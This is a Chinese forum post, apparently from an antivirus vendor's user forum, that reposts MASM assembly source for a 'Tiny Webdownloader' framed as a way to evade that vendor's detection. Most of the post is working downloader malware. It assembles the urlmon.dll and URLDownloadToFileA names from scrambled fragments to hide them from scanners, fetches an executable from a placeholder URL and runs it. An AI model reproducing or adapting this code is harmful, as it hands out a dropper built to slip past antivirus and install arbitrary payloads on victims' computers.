xiahanxing 
新手上路 
 
 
  
  
积分 2 
发帖 2 
注册 2006-9-6 
 | 
#1  我从别的看到的一种病毒通过微点的思路
  
我从别的看到的一种病毒通过微点的思路 
转载过来 微点研发人员看看 hoho  
 
过微点的方法(源码) 
不被微点报的前提是 不访问网络,不生孩子   
 
;Tiny Webdownloader by Aphex 
;Hides use of URLDownloadToFileA to foil TDS  
;http://iamaphex.cjb.net 
;unremote@knology.net 
 
 
.386 
.model flat, stdcall 
include \masm32\include\kernel32.inc 
includelib \masm32\lib\kernel32.lib 
 
.data 
Url byte 'http://your.isp.goes.here/file.exe', 0 
Exe byte '~.exe', 0 
Scramble1 byte 'dll', 0 
Scramble2 byte '.', 0 
Scramble3 byte 'mon', 0 
Scramble4 byte 'url', 0 
Scramble5 byte 'A', 0 
Scramble6 byte 'File', 0 
Scramble7 byte 'To', 0 
Scramble8 byte 'Download', 0 
Scramble9 byte 'URL', 0 
 
.data? 
UrlMonDll byte 11 dup (?) 
UrlDownload byte 19 dup (?) 
UrlMon dword ? 
UrlDownloadToFile dword ? 
 
.code 
_main: 
;unscrambles urlmon.dll 
invoke lstrcpyn, addr UrlMonDll, addr Scramble4, 4 
invoke lstrcat, addr UrlMonDll, addr Scramble3 
invoke lstrcat, addr UrlMonDll, addr Scramble2 
invoke lstrcat, addr UrlMonDll, addr Scramble1 
 
;unscrambles URLDownloadToFileA 
invoke lstrcpyn, addr UrlDownload, addr Scramble9, 4 
invoke lstrcat, addr UrlDownload, addr Scramble8 
invoke lstrcat, addr UrlDownload, addr Scramble7 
invoke lstrcat, addr UrlDownload, addr Scramble6 
invoke lstrcat, addr UrlDownload, addr Scramble5 
 
;loads urlmon.dll 
invoke LoadLibrary, addr UrlMonDll 
mov UrlMon, eax 
 
;links URLDownloadToFileA dynamically 
invoke GetProcAddress, UrlMon, addr UrlDownload 
mov UrlDownloadToFile, eax 
 
;delete previous version 
invoke DeleteFile, addr Exe 
 
;downloads the exe 
push 0 
push 0 
push offset Exe 
push offset Url 
push 0 
call UrlDownloadToFile 
 
;runs the exe 
invoke WinExec, addr Exe, 0 
 
;exits 
invoke ExitProcess, 0 
 
end _main
  
 |  | 
※ ※ ※ 本文纯属【xiahanxing】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
 |  
  |  
 
 |